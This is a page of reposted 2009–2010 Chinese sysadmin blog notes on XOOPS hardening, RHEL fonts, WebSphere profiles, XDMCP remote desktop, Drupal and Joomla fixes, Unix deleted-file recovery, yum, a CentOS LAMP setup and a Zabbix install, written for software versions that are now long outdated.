温室小花.技术.博客 --纯粹的unix技术博客 » 应用服务

XOOPS安全向導(网上转摘）

admin — Sun, 11 Apr 2010 03:38:59 +0000

首先，你需要記住這個︰沒有一個100%安全的系統。任何事物都是相對的。在這個前提下，我們可以做一些使你的系統更安全的措施。
這個向導概述了不同的步驟來使你的系統更安全，技巧有來自XOOPS-TIPS.com的，也有來自XOOPS官方論壇的，多數的技巧已經被在XOOPS-TIPS.com列出來了，但是列出來的是分散的。我們希望把這些技巧分門別類，使你能更好的領會”安全問題”。

選擇一個好的空間服務商
我們總是把那個公司提供最多的功能而價格最低廉放在選擇空間的首位，其實，很多其他的因素值得注意。

下面是一些技巧︰
一個好的著名的空間服務商通常意味著安全。因為我們沒有一個預算來單獨買一台主機，你應當注意整個主機的安全性和在這個主機上的其他網站的安全性。因為這些對你的網站的安全至關重要。
不管你的網站多麼安全，如果你的伺服器被在上面的其他網站威脅，你使你的網站更安全的措施都是白費力。
轉讓或規模較小的空間服務商應當被避免選擇。因為通常來說，我們沒有資源或者方法來監視你的伺服器。

安裝——選擇一個不好猜測的前綴
在安裝進程中，選擇一個不好猜測的前綴，像︰f56Gewg_3GE98FE53fgw，或者HK_er__twgwY98Fgfw。
如果你用的預設的“xoops”作為前綴，你可以用GIJOE的“XOOPS Protector”這個模組來修改前綴

安裝完成後馬上應該做的
當你安裝完XOOPS的時候，不要忘記刪除安裝目錄和修改mainfile.php的權限。不刪除安裝目錄、不修改mainfile權限，相當于公開要請別人來重新安裝並且取代你控制這個網站。

安裝”XOOPS Protector”模組
當你安裝完XOOPS 的時候，你應當安裝的第一個模組是GIJOE的”XOOPS Protector”模組。如果你對你的網站安全很在意，GIJOE的“XOOPS Protector”模組是必須安裝的的。
XOOPS可能是最安全的CMS之一，然而，它的核心有潛在的隱患可能使黑客攻擊進入你的網站。這一點已經被GIJOE——“對XOOPS安全貢獻最大的人”證明。
獲得更多信息，請訪問GIJOE的網站︰http://www.peak.ne.jp/xoops/

把用戶名和密碼從Mainfile.php中移出來
你安裝完XOOPS後，我們建議你把資料庫的用戶名和密碼從mainfile.php中移出來。把敏感的信息從網站目錄中移出來是很好的安全措施。這可以避免由你的伺服器失誤導致的敏感信息泄漏。例如PHP停止編譯，如果這樣的話，PHP文件里的信息可以被任何人讀到。
關於這個技巧的詳細信息，請訪問︰http://xoops-tips.com/news-article.storyid-1.htm

保護Admin.php和“系統管理”模組
Admin.php是任何人都可以訪問的，這就為駭客攻擊提供可乘之機，保護Admin.php的方法請訪問︰http://xoops-tips.com/news-article.storyid-9.htm

保護風格目錄（themes）
你可以阻止你的風格目錄被探測器探測到，詳細請訪問︰http://xoops-tips.com/news-article.storyid-25.htm

關掉“列表目錄”功能
如果你的伺服器有”關閉列表目錄”功能的話，關掉它！如果伺服器不提供這個功能，建立一個“index.html”輸入以下代碼︰
上傳到XOOPS所有的目錄，除了根目錄和模組的根目錄。
XOOPS預設存在這個文件（index.html），但是我們建議你確保每個目錄裡都有這個文件（除了根目錄和模組的根目錄）。

保護管理員的Email地址
除了對用戶以外，你絕對不應該把管理員的Email地址告訴給其他人。如果你正在用 “XOOPS headline”模組，請訪問以下的網址來確保你的管理員Email不泄漏給其他人︰

http://xoops-tips.com/news-article.storyid-51.htm

第三方模組
注意第三方模組，這裡面可能存在一些作者沒有察覺的安全隱患。
如果你正在使用第三方模組，請經常檢查更新，並且有規律的訪問XOOPS論壇，看一下其他用戶的反映。
其他的你應該做的︰
1.經常備份你的網站內容。
2.在“訪問量”和安全之間找到平衡點︰適當的開啟審核功能。
3.保證你的XOOPS是最新的。
4.PHP 和 MySQL 方面︰考慮開啟“cgi-wrap“功能，但這是以犧牲速度為代價的。
5.禁止緩存︰如果你是需要出售內容的，考慮在 theme.htm 的頂部加入以下代碼︰

這會阻止搜尋引擎緩存你的內容。如果不這樣，即使你阻止了一個人的IP，他仍然可以從搜尋引擎的緩存中獲得你的內容，但注意，這會使你的搜尋引擎排名降低！

最後一點︰不要過於自信，保持高度仔細。
祝你使用XOOPS愉快！

insraq的主頁︰http://isnraq.xoops.cn
XOOPS官方網站︰http://www.xoops.org.cn
XOOPS-TIPS.com︰http://www.xoops-tips.com
XOOPS CHINA︰http://www.xoops.org.cn

=================================
這個文件的Word版本請在附件下載！Word版本有更好的顯示效果！
請尊重原作者和insraq的勞動成果，轉載時請完整轉載。
注意！這個版本我刪掉了一些沒有用的解釋性的話，原作請訪問︰

http://xoops-tips.com/news-article.storyid-81.htm

rhel5.4中文包的安装以及WebSphere概要文件的创建与删除

admin — Thu, 28 Jan 2010 13:20:22 +0000

一、Red Hat Enterprise Linux 5.0版本下的中文包的安装

需要找到光盘上的２个中文支持字体包安装上即可.
文件名如下,注意不同版本文件明后面数字部分可能会不同,其代表版本号.下面是Red Hat Enterprise Linux 5.0版本下的中文包文件名.
fonts-chinese-3.02-9.6.el5.noarch.rpm
fonts-ISO8859-2-75dpi-1.0-17.1.noarch.rpm

分别双击上面的2个文件并安装,完毕后无需从新启动系统即可支持中文,(可能需要关闭然后从新打开需要显示中文的应用程序)．

这种方法，也适用于rhel5.4版本。

二、websphere 创建概要文件脚本.

　　创建概要文件：

　　方案一：./manageprofiles.sh -create -profileName AppSrv01

　　-profilePath /opt/IBM/WebSphere/AppServer/profiles/AppSrv01

　　-templatePath /opt/IBM/WebSphere/AppServer/profileTemplates/default

　　方案二：开始－程序－IBM WebSphere-Application Server-Profile Management Tool, 按照提示创建。

三、解决AppSrv02概要文件删除不彻底问题。

　　删除概要文件：

　　方案一：

　　1.找到profileRegistry.xml，在目录IBM\WebSphere\AppServer\properties里,去掉想删除的profile的配置即可。
　　2.删除profileName.bat 在目录IBM\WebSphere\AppServer\properties\fsdb里，删除

　　3.将profile的实际存储目录及内容删除，如：D:\IBM\WebSphere\AppServer\profiles\AppSrv01

　　方案二：

　　使用命令 manageprofiles.bat -delete -profileName profileNam

可以AppServer\properties\profileRegistry.xml下把节点配置删除，然后把profile下相应文件夹和程序启动的快捷方式都删除就可以.

用Xmanager远程连接Red hat Enterprise Linux 5

admin — Thu, 21 Jan 2010 13:36:09 +0000

具体方法如下:

服务器：Red hat Enterprise Linux 5

终端：Xmanager 3.0

服务器配置：－－－－－－－－－－－－－－－－－－－－－－－－
1. 配置 XDM

(1). Change runlevel to 5
id:5:initdefault:
修改 /etc/inittab，将运行级别设置为5，即:
id:5:initdefault:

(2). Enable XDMCP

修改 /etc/gdm/custom.conf，

将 [xdmcp] 部分的 Enable 设置为 1，即：
[xdmcp]
Enable=1
Post=177
将 [security] 部分的 DisallowTCP 设置为 false，即：
[security]
DisallowTCP=false
2. 配置防火墙 (TCP/UDP Ports) / 若已经关闭防火墙，则忽略这一步
Open UDP port 177 from the PC to the remote host direction.
Open incoming TCP ports 6000~6010 from the remote host to your PC.
3. 重新启动服务器，即输入下面的命令即可：
# init 3; init 5
终端配置
－－－－－－－－－－－－－－－－－－－－－－－－
1、点击 Xmanager 图标，打开 Xbrowser
这时 Xbrowser 窗口中会显示局域网中所有的可用服务器

drupal CMS 系统安装ubercart 报内存不足的解决办法

admin — Sun, 10 Jan 2010 05:02:10 +0000

这些天，新开一个网站，主要是面向女性网站的，网址为：http://www.ladyfeel.net 女情网，想着在经营这个网站时，增加这个网站的购物车功能，就在网上找到这个ubercart ，一个drupal兼容性的很好的购物车模块。谁知。在装那些match的插件时，总是提示内存不足。。页面错误提示：Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 64 bytes) 等类似信息。上网找了找。找到这些信息：
I got this error:
“Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 2761 bytes) in /home/gotantan/public_html/rwolfefamily/modules/views/views_cache.inc on line 146″

I found this solution:

http://drupal.org/node/76156

“That indicates that Drupal needed more memory than PHP was allowed to give it.

Increase PHP’s memory limit, either by adding:

memory_limit = 12M to your php.ini file (recommended, if you have access)
ini_set(‘memory_limit’, ’12M’); in your sites/default/settings.php file
php_value memory_limit 12M in your .htaccess file in the Drupal root
Some hosts allow a PHP.ini in the root of your site.

Depending on the amount of modules you have enabled and their ‘impact’ on the site you may need to increase the memory_limit even more (sometimes to 30 MB or more). Experiment with what memory value works for your needs.

You may need to restart your server before the php.ini settings take effect.”

俺试了试，都不行，就认为可能是俺没权限重启外国主机。致使设置不能生效。那联络上外国主机技术支持客服。跟对方沟通后。对方给了俺以下信息，就了无信息：
Your PHP.INI file is the file you need to modify in order to increase your memory limit.

the settings you will need to modify are these:

max_execution_time = 30 ; Maximum execution time of each script, in seconds (set this to something high like 300)

max_input_time = 60 ; Maximum amount of time each script may spend parsing request data (set this to something high like 600)

memory_limit = 10M ; Maximum amount of memory a script may consume (set this to something like 500M)

Then in the php config icon of your account, set your site to the php5 (single php.ini) settings as the Fast CGI is not compatible with some drupal installations. if you find that fast cgi works, great if not, just stay on the php 5 setting.

Also, you do Not need to , and you cannot reboot the server on bluehost. We have a special modification to our server that allows the php.ini files to be initialized on the fly and it does not need to be restarted every time a change is made. Therefore, make the changes in the php.ini and refresh your site a couple of times and the new settings will be applied.

To see if the settings you are making in your account are taking affect, put a phpinfo.php file in your account and use the

Lastly, do not use the php_flag variable in our server. The .htaccess file does not recognize that flag and it will result in your account producing a 500 error, just make your modifications to the php.ini file itself.

If the above memory fix does not solve your problem, there may be a file in the drupal that is limiting your memory usage. (as this line suggests here: “ini_set(‘memory_limit’, ’12M’); in your sites/default ttings.php file”)

If all the above doesn’t work, contact the bluehost support and drupal to see if there are any other fixes to your problem and/or any other files you may need to modify.

Thanks

没办法之下，那俺只好死马当活马医。最好终于解决这个问题。原来问题是在php.ini设置的允许内存不够大。之前设成32,64,128,256m都不行。最好，俺抱着试一试的心理，将允许内存大小设为1024m，却发现，可以成功安装上ubercart，在创建内存的选项里，终于见到产品的选项。。。至此，问题，得以解决。

恢复Unix系统被删除的文件

admin — Sat, 12 Dec 2009 05:06:46 +0000

与DOS/Windows不同，Unix文件被删除后很难恢复，这是由Unix独特的文件系统结构决定的。所以，要想恢复这些文件，就需要另辟蹊径。Unix文件系统的特殊性决定了它不能像Windows系统那样恢复被删除的文件。

Unix 文件目录不像DOS/Windows那样，文件即使被删除之后仍保存有完整的文件名、文件长度、始簇号(即文件占有的第一个磁盘块号)等重要信息。相反，它的文件信息全部依靠一种被称为i节点的数据结构来描述，而i节点在相应文件被删除之后即被清空，因此，要想直接恢复被删除的文件内容几乎是不可能的，必须另辟蹊径。本文结合实际，讨论几种文件恢复策略及其关键步骤的具体实现。　

不过，需要说明的是，Unix系统下文件系统恢复的具体实现依赖于不同操作系统和不同版本的具体文件系统结构和磁盘块分配算法（见附文）。本文只是试图总结出一种一般性的思路和策略，限于篇幅，不能详细讨论它们的具体实现过程。

Unix文件系统结构

我们知道，Unix是以文件卷作为其文件系统存储格式的，而不同的Unix系统，文件卷格式是有差异的，甚至即使是同一Unix操作系统的不同版本，其文件系统也未必完全相同，例如: SCO Unix 4.1版与5.0版文件系统结构就有明显差异，但只要是Unix系统，其文件卷的基本结构是一致的。

不管是什么Unix系统，不管什么版本，其文件卷至少包括引导块、超级块、i节点表、数据区等几个部分。

1. 引导块

位于文件卷最开始的第一扇区，这512字节是文件系统的引导代码，为根文件系统所特有，其他文件系统这512字节为空。

2. 超级块

位于文件系统第二扇区，紧跟引导块之后，用于描述本文件系统的结构。如i节点长度、文件系统大小等，其结构存放于/usr/include/sys/filsys.h中，其结构如下:

struct filsys

{ ushort s_isize; /*磁盘索引节点区所占用的数据块数*/

daddr_t s_fsize; /*整个文件系统的数据块数*/

short s_nfree; /*在空闲块登录表中当前登记的空闲块数目*/

daddr_t s_free[NICFREE]; /*空闲块登记表*/

short s_ninode; /*空闲索引节点数*/

ino_t s_inode[NICINOD]; /*空闲节点登记表*/

char s_flock; /*加锁标志位*/

char s_ilock; /*节点加锁标志位*/

char s_fmod; /*超级块修改标志*/

char s_ronly; /*文件系统只读标志*/

time_t s_time; /*超级块上次修改的时间*/

short s_dinfo[4]; /*设备信息*/

daddr_t s_tfree; /*空闲块总数*/

ino_t s_tinode; /*空闲节点总数*/

char s_fname[6]; /*文件系统名称*/

char s_fpack[6];

long s_fill[13]; /*填空位*/

long s_magic; /*指示文件系统的幻数*/

long s_type; /*新文件系统类型*/ };

3. i节点表

i节点表存放在超级块之后，其长度是由超级块中的s_isize字段决定的，其作用是用来描述文件的属性、长度、属主、属组、数据块表等，其数据结构在/usr/include/sys/ino.h中，如下:

struct dinode

{ ushort di_mode;

short di_nlink;

ushort di_uid;

ushort di_gid;

off_t di_size;

char di_addr[40];

time_t di_atime;

time_t di_mtime;

time_t di_ctime; };

4. 目录结构

Unix所有文件均存放于目录中，目录本身也是一个文件。目录存放文件的机制如下: 首先，目录文件本身也象普通文件一样，占用一个索引节点; 其次，由这个索引节点得到目录内容的存放位置; 再次，从其内容中取出一个个的文件名和它对应的节点号，从而访问一个文件。

由此可知文件名是依靠目录来描述的，文件的内容和其他信息则由索引节点来描述。

被删文件的恢复策略

Unix 下删除一个文件的过程很简单，那就是释放索引节点表和文件占用的数据块，清空文件占用的索引节点，但不清除文件内容。但删除文件与删除目录的处理不尽相同，不同命令删除文件的过程也不相同。 Unix 删除一个文件的具体步骤是: 根据文件i节点的地址表逐一释放文件占用的磁盘数据块，然后清空相应的节点，最后释放i节点。删除一个目录的过程是: 首先逐一删除目录里的所有文件，然后删除目录。目录本身也是一个文件，故删除方法与删除文件一致。

要恢复被删除的文件，只能根据删除后留下的东西去做文章。文件被删除后留下了什么呢？由上述分析可知: 其一，留下了文件的内容; 其二，留下了“现场”。文件的恢复策略只能从这两个方面来分析。

1.根据磁盘现场进行恢复

如果文件被删除，现场未被破坏(即文件被删除后硬盘未发生过写操作)，而且假定只删除了一个文件，那么可根据系统的分配算法进行恢复。因为系统建立一个文件时，必定根据某一特定的分配算法决定文件占用的数据块位置。而当该文件被删除后，它所占用的数据块被释放，又回到系统的分配表中，这时如果重新建立一个文件，系统根据原来的分配算法分配出的数据块必定跟该文件原来占用的数据块一致。而且我们知道，Unix文件最后一个数据块尾部多出的字节是全部置0的，据此只要调用系统的数据分配算法，在系统中一块一块地申请数据块，只要发现一个分配出的数据块中尾部全为0，即可认为文件结束，由此可确定文件长度和内容，进而实现恢复。方法如下:

● 申请一个索引节点，即向系统申请创建一个新文件名而不写入任何内容。如: #>/tmp/xx。

● 调用系统分配数据块算法getnextfreeblock()得到一个数据块号，记入某一地址表变量中。

● 读出这个数据块，判断其尾部是否全部连续为0，若不是，则回到第二步，若是，则进行第四步。

● 首先用系统函数fstat得到/tmp/xx的i节点号，然后将第二步所得的地址表写入索引节点的地址表中(注意间址问题)，并根据数据块个数和最后一块中有效数据长度计算出文件大小，写入i节点的di_size字段。

● 回写系统的索引节点表即可。

需要说明的是: 第一，系统分配数据块的算法因不同的Unix版本而不同; 第二，有的Unix如SCO Unix 5.0版，其空闲数据块的分配和回收是使用一种动态链表的数据结构来实现的，它们的文件恢复更加容易，只要在空闲链表中的表尾去寻找即可。

2. 根据内容恢复

若现场已被破坏，即硬盘发生过写操作，那么只好根据内容来恢复。而且，由于Unix是一个多进程、多用户系统，它每一次开关机或硬件、通信故障等都会记录系统日志、.sh_history等，硬盘现场被破坏的可能性极大。因此讨论按内容恢复的方法具有更大的实用价值。笔者经过实际探索得出下列四种恢复策略供参考。

● 关键字搜索法

如果知道被删除的文件内容中若干字节的内容，而且该文件长度又不超过一个磁盘块，那么可以在整个文件系统中搜索这一字节串，得出一个文件所在的数据块，将它们的块号填入一个i节点，即可恢复一个文件。搜索文件系统的算法很简单，说明如下: 首先，用“#df －k”命令确定文件系统的设备文件名(如/dev/root); 然后，用下述函数搜索，若成功，返回数据块号，反之返回-1。其中fsname是文件系统的设备名，如/dev/root，comp()参数是实现搜索条件的函数。

long searchfs(char *fsname , int comp())

{ FILE *fp;

char buf[1024];

long i=0;

fp=fopen(fsname,”r”);

while (!feof(fp))

{ fread(buf,1024,1,fp);

if (comp()) /* 检查是否符合搜索条件 */

return i; /* 若成功返回块号 */

i++;

}

fclose(fp);

return -1; /* 未找到符合条件的块，返回-1*/ }

● 精确长度搜索法

如果知道被删除文件的精确长度(字节数)，那么可根据一个数据块的大小，计算出文件的最后一个数据块中数据的精确长度，该数据块中其他字节必然是全0。根据这一条件，通过搜索整个文件系统，找出其中符合条件的数据块，若出现多个块符合要求，则还需要根据其他条件区分。但不管怎样，根据精确长度分析也是恢复数据的一个策略。

● 内容关联法

如果知道文件内容中存在某种可实现的关联，例如文件的校验和或者文件内容的某种上下文关系，那么也可通过搜索整个文件系统，通过反复尝试寻找符合关联条件的磁盘数据块，进而恢复一个文件。

● 环境比较法

如果知道删除文件所在的文件系统的安装过程，那么，另找一台完全相同的机器，按原来完全相同的步骤安装相同版本的Unix和相应的其他软件。可以想象，新的机器环境会与原来的环境基本相同，比较两个机器上相同文件系统的内容，可以推断出被删除文件的大致位置，至少可以大大减少查找的范围，一旦查找的范围足够小时，就可以用逐个观察和尝试的方法结合其他条件恢复数据，降低恢复的难度，增加恢复的可靠性。 (作者单位: 中国人民银行抚州市中心支行 )

链接

SCO Unix磁盘块分配算法

由于一个磁盘块的大小为1024字节，所以一个位图块可以管理0×400×8=0×2000个磁盘块。那么，下一个位图块的块号就是0x61d+ 0×2000=0x261d。这与位图索引块中的数据是相符的。那么，位图块0x61d管理着块号为0x61d-0x261c的磁盘块。由以上数据可见，在这个位图块中，第一个被使用的磁盘块块号是0x61d，即位图块本身。第一个空闲块块号由0×187401处字节0x1c的第2位指示，是0×627。由于该位图块是文件卷中的第一个位图块，所以0×627号磁盘块也是文件卷中的第一个空闲块。当我们向系统申请磁盘块时，系统通过超级块、位图索引块、位图块来寻找那些标志位为1的块，然后将相应的标置位置0。

当释放一个磁盘块时，系统就将相应的标志位置1。现在，我们就可以判断出文件卷中的每一个磁盘块是否被使用了。但是仅凭这些还不能完全恢复误删的文件，我们还得了解SCO Unix分配磁盘块的算法。为了使一个文件所占用的磁盘块相对集中，SCO Unix是按照特定的算法来选择空闲块分配给文件的。假设某文件所占用的最后一个磁盘块的块号为m，现在要再分配一磁盘块给该文件，若该文件是新文件，则 m=0。

关于 joomla 404 错误解决办法-组件未找到 component not found

admin — Mon, 07 Dec 2009 01:16:52 +0000

今天遇到joomla传说中的404错误，关闭sef或者apache rewrite模块也没用，中文的资料基本没有解决问题。
404 – Component not found
You may not be able to visit this page because of:
an out-of-date bookmark/favourite
a search engine that has an out-of-date listing for this site
a mistyped address
you have no access to this page
The requested resource was not found.
An error has occurred while processing your request.
Please try one of the following pages:…

最后在英文论坛找到解决办法：
=======================
In developing our new site with Joomla 1.5.1 all was going fine then we started getting the 404 Component Not Found Error people are talking about. We also noticed that our FrontPage was blank/gone. We put in another piece of content for the FrontPage, but this did NOT fix it.
So, I tried turning on and off the Search Engine Friendly settings but that did NOT resolve it either.
EASY SOLUTION (from another post)

No default menu is set in the Main Menu. Go into your Admin page/control panel and go to the Menu Item Manager for the Main Menu. Click the check box next to the Home page at the top of the list. Then click on the yellow star icon in the upper-right corner.
chenke=> 简单解决方案：是因为Main menu中没有指定默认菜单引起的。进入管理后台-》菜单项管理-》Main Menu，点击列表中Home page项的前的选项框，然后点击右上方的黄色星星按钮，完毕。（不一定解决所有组件未找到问题）
ALTERNATE SOLUTION
So I set Debug Info to Maximum and examined the function call stack. After further analysis I noticed that the error was getting triggered when trying to call the dispatch() function for a component (which one I could not tell). It calls the renderComponent() function which does a check on the component name, if it is empty then it raises a 404 Component Not Found Error. For whatever reason Joomla seems to be calling dispatch() on a component with an empty name (possibly because a component is disabled or the FrontPage is broken/missing,) which it should NOT do, and generates the error. I put a very simple if statement in the code which fixed the problem!
In the “includes” directory in the root Joomla directory there is a file called “application.php” Locate the dispatch() function (at line 89). Right before the call (at line 124) to JComponentHelper::renderComponent() put in this “if” statement like below. Make sure it looks exactly like this.
if(! empty($component)) {
$contents = JComponentHelper::renderComponent($component);
$document->setBuffer( $contents, ‘component’);
}
Upload the file to the includes directory and try refreshing your browser again.
Also, if anyone can tell if the error is caused by a disabled component (by turning on all components and seeing if the error goes away) it would be good to post any info about this as well.

linux 中命令yum的用法 (网上找的）

admin — Sat, 10 Oct 2009 06:03:17 +0000

前几天，为了搭建另外一个CENTOS服务器。好好研究了一下yum的用法，转将一篇从网上找的文章转贴于这里。方便俺日后查询吧。。

这个命令在查找安装盘中的rpm比较快，现在把常用的命令用法列一下，当笔记记录一下
1.列出所有可更新的软件清单
命令：yum check-update
2.安装所有更新软件
命令：yum update
3.仅安装指定的软件
命令：yum install
4.仅更新指定的软件
命令：yum update
5.列出所有可安裝的软件清单
命令：yum list
用YUM安装删除软件
装了系统添加删除软件是常事，yum同样可以胜任这一任务，只要软件是rpm安装的。
安装的命令是，yum install xxx，yum会查询数据库，有无这一软件包，如果有，则检查其依赖冲突关系，如果没有依赖冲突，那么最好，下载安装;如果有，则会给出提示，询问是否要同时安装依赖，或删除冲突的包，你可以自己作出判断。
删除的命令是，yum remove xxx，同安装一样，yum也会查询数据库，给出解决依赖关系的提示。
1.用YUM安装软件包
命令：yum install
2.用YUM删除软件包
命令：yum remove
用YUM查询软件信息
我们常会碰到这样的情况，想要安装一个软件，只知道它和某方面有关，但又不能确切知道它的名字。这时yum的查询功能就起作用。你可以用 yum search keyword这样的命令来进行搜索，比如我们要则安装一个Instant Messenger，但又不知到底有哪些，这时不妨用 yum search messenger这样的指令进行搜索，yum会搜索所有可用rpm的描述，列出所有描述中和messeger有关的rpm包，于是我们可能得到gaim，kopete等等，并从中选择。
有时我们还会碰到安装了一个包，但又不知道其用途，我们可以用yum info packagename这个指令来获取信息。
1.使用YUM查找软件包
命令：yum search
2.列出所有可安装的软件包
命令：yum list
3.列出所有可更新的软件包
命令：yum list updates
4.列出所有已安装的软件包
命令：yum list installed
5.列出所有已安装但不在 Yum Repository 內的软件包
命令：yum list extras
6.列出所指定的软件包

命令：yum list
7.使用YUM获取软件包信息
命令：yum info
8.列出所有软件包的信息
命令：yum info
9.列出所有可更新的软件包信息
命令：yum info updates
10.列出所有已安裝的软件包信息
命令：yum info installed
11.列出所有已安裝但不在 Yum Repository 內的软件包信息
命令：yum info extras
12.列出软件包提供哪些文件
命令：yum provides
清除YUM缓存
yum 会把下载的软件包和header存储在cache中，而不会自动删除。如果我们觉得它们占用了磁盘空间，可以使用yum clean指令进行清除，更精确的用法是yum clean headers清除header，yum clean packages清除下载的rpm包，yum clean all一股脑儿端
1.清除缓存目录(/var/cache/yum)下的软件包
命令：yum clean packages
2.清除缓存目录(/var/cache/yum)下的 headers
命令：yum clean headers
3.清除缓存目录(/var/cache/yum)下旧的 headers
命令：yum clean oldheaders
4.清除缓存目录(/var/cache/yum)下的软件包及旧的headers
命令：yum clean, yum clean all (= yum clean packages; yum clean oldheaders)

centos4.2 下yum 安装apache2 mysql4 php4 笔记

admin — Fri, 09 Oct 2009 04:13:58 +0000

由于网站国庆中秋假期出了点问题，是网站服务器管理员人为因素造成的网站不能访问。俺深思之下，决定外迁网站，就跟其它相熟的网友伸请一个免费的VPS主机，空间不大那种。，但空间完全让俺管理，没有其它网站服务的。而且环境还是裸机环境，也就是除了基本系统，以及一个yum外。没有其它网络服务在运行。也就是apache mysql,php环境要自已完全搭建。在搭建apache mysql php环境虽遇到一些波折。但也学习懂得许多，也了解到更多，同时，也精进俺在linux/unix的服务器维护以及以及数据库维护持术。由于俺很久没用linux，以往也少用yum这种软件版本升级安装工具。所以，俺也借此环境搭建，熟悉了yum这种软件版本升级安装工具，以及相关命令。。。。
由于服友的vps 系统是centos 4.2 所以，也只能安装apache2,mysql4,php4 ，可能由yum源的限制，centos 4只能安装apache2,mysql4,php4 ,暂时没有找到可以在centos4.安装apache2,mysql5,php5的源。当然，俺从中也懂得如何修改yum的源。俺之前都说，俺很少用yum。这些也顺便熟悉yum源的设置与相关命令使用。。　
俺在安装apache2,mysql4,php4时，借鉴一些网上的文档，由于网上的文档千篇一律，大同小异，并且都没有什么验证过。致使俺在安装amp环境时，遇到一些疑惑或者问题，但后来都懂过经验来判断解决。。。下面就是俺的安装笔记。跟网上一些文档有些区别，算是俺的修订版吧。。。

centos 用yum来管理安装Apache+PHP+Mysql的基本安装。
1. 安装Apahce, PHP, Mysql, 以及php连接mysql库组件。
yum -y install httpd php mysql mysql-server php-mysql
Yum -y install mysql*
2. 配置开机启动服务
/sbin/chkconfig httpd on [设置apache服务器httpd服务开机启动]
/sbin/chkconfig –add mysqld [在服务清单中添加mysql服务]
/sbin/chkconfig mysqld on [设置mysql服务开机启动]
/sbin/service httpd start [启动httpd服务,与开机启动无关]
/sbin/service mysqld start [启动mysql服务,与开机无关]

Yum 安装的mysql下自动生成my.cnf没法正常使用。致使mysql无法正常启动。必需手工编辑一个新的my.cnf 文件。
但就是在这点花费大量时间去排查与查文档。查了大量文档，都没有查到，最后才在一个外国网站查到有人说，centos4　默认yum安装mysql 所产生的my.cnf有问题。所以，俺才将排查重点放在my.cnf　上面。最后，在网上顺便找一个my.cnf配置代替原有的my.cnf ，之后，mysql就启动成功。。
My.cnf内容如下：
[client]
#password = your_password
port = 3306
socket = /var/lib/mysql/mysql.sock

[mysqld]
port = 3306
socket = /var/lib/mysql/mysql.sock
skip-locking
key_buffer = 16M
max_allowed_packet = 1M
table_cache = 64
sort_buffer_size = 512K
net_buffer_length = 8K
read_buffer_size = 256K
read_rnd_buffer_size = 512K
myisam_sort_buffer_size = 8M
skip-innodb

log-bin
server-id = 1
[mysqldump]
quick
max_allowed_packet = 16M

[mysql]
no-auto-rehash
# Remove the next comment character if you are not familiar with SQL
#safe-updates

[isamchk]
key_buffer = 20M
sort_buffer_size = 20M
read_buffer = 2M
write_buffer = 2M

[myisamchk]
key_buffer = 20M
sort_buffer_size = 20M
read_buffer = 2M
write_buffer = 2M

[mysqlhotcopy]
interactive-timeout
再运行 /sbin/service mysqld start mysql 就运行成功。
3.设置mysql数据库root帐号密码。
mysqladmin -u root password ‘newpassword’ [引号内填密码]
4. 让mysql数据库更安全
mysql -u root -p
mysql> DROP DATABASE test; [删除test数据库]
mysql> DELETE FROM mysql.user WHERE user = ”; [删除匿名帐户]
mysql> FLUSH PRIVILEGES; [重载权限]
5. 按照以上的安装方式, 配置出来的默认站点目录为/var/www/html/
//安装apache扩展
yum -y install httpd-manual mod_ssl mod_perl mod_auth_mysql
//安装php的扩展
yum install php-gd
yum -y install php-gd php-xml php-mbstring php-ldap php-pear php-xmlrpc
//安装mysql扩展
yum -y install mysql-connector-odbc mysql-devel libdbi-dbd-mysql

zabbix 1.6.6 安装配置步骤

admin — Tue, 15 Sep 2009 04:01:03 +0000

zabbix 是一款新兴的开源网络监控软件。。跟nagios cacti有得一拼。特摘录下面的一篇文章来作个记录。有空多研究。。。

zabbix 1.6.6 安装配置步骤

环境：CentOS5.2

一、LAMP环境搭建（）
前提是保证LAMP已经正常运行(yum install httpd mysql mysql-server php perl)
另外需先安装下面的软件包
最好用yum来安装，自动解决软件包之间的依赖关系
mysql-devel
net-snmp-devel
curl-devel
perl-DBI
php-gd
php-mysql
php-bcmath

二、数据库及其相关表的建立
-bash-3.1# wget
-bash-3.1# tar zvxf zabbix-1.6.6.tar.gz
-bash-3.1# cd zabbix-1.6.6
-bash-3.1# mysql -u root -p
mysql> create database zabbix;
mysql>quit;
-bash-3.1# cd create/schema/
-bash-3.1# cat mysql.sql | mysql -u root -p zabbix
-bash-3.1# cd ../data/
-bash-3.1# cat data.sql | mysql -u root -p zabbix
-bash-3.1# cat images_mysql.sql | mysql -u root -p zabbix
三、编译安装zabbix
服务器端的编译
-bash-3.1# ./configure –with-mysql –with-net-snmp –with-libcurl –enable-server –enable-agent –enable-proxy
–prefix=/usr/local/zabbix
客户端的编译

./configure –prefix=/usr/local/zabbix –enable-agent
-bash-3.1# make
-bash-3.1# make install
-bash-3.1# vi /etc/services
添加
zabbix-agent 10050/tcp Zabbix Agent
zabbix-agent 10050/udp Zabbix Agent
zabbix-trapper 10051/tcp Zabbix Trapper
zabbix-trapper 10051/udp Zabbix Trapper

四、拷贝一些文件以及修改一些文件
-bash-3.1# mkdir /etc/zabbix
-bash-3.1# cp misc/conf/* /etc/zabbix/
-bash-3.1# cd frontends/
-bash-3.1# cp -a php /var/www/html/
-bash-3.1# cd /var/www/html/
-bash-3.1# mv php zabbix
-bash-3.1# chown zabbix:zabbix -R zabbix/
-bash-3.1# cd /var/www/html/zabbix/include
-bash-3.1# vi db.inc.php
添加如下内容，同时还要修改/var/www/html/zabbix/include/setup.inc.php同样加入下面的内容
$DB_TYPE=”MYSQL”;
$DB_SERVER=”localhost”;
$DB_DATABASE=”zabbix”;
$DB_USER=”root”;
$DB_PWD=”";
-bash-3.1# vi /etc/php.ini
找到max_execution_time = 30
改成max_execution_time = 300
找到 ;date.timezone =
改成date.timezone = Asia/Shanghai
对配置文件做一下修改，配置文件为：
-bash-3.1# vi /etc/zabbix/zabbix_server.conf
-bash-3.1# vi /etc/zabbix/zabbix_agentd.conf
这两个文件可以看里面的说明来修改

复制启动程序
-bash-3.1# cp misc/init.d/redhat/zabbix_server_ctl /etc/init.d/
-bash-3.1# cp misc/init.d/redhat/zabbix_agentd_ctl /etc/init.d/
修改启动程序参数
-bash-3.1# vi /etc/init.d/zabbix_server_ctl
# base zabbix dir
BASEDIR=/usr/local/zabbix
# PID file
PIDFILE=/var/tmp/zabbix_server.pid
# binary file
ZABBIX_SUCKERD=$BASEDIR/sbin/zabbix_server
-bash-3.1# vi /etc/init.d/zabbix_agentd_ctl
# base zabbix dir
BASEDIR=/usr/local/zabbix
# pid file (as of 1.0 beta 10)
PIDFILE=/var/tmp/zabbix_agentd.pid
# binary file
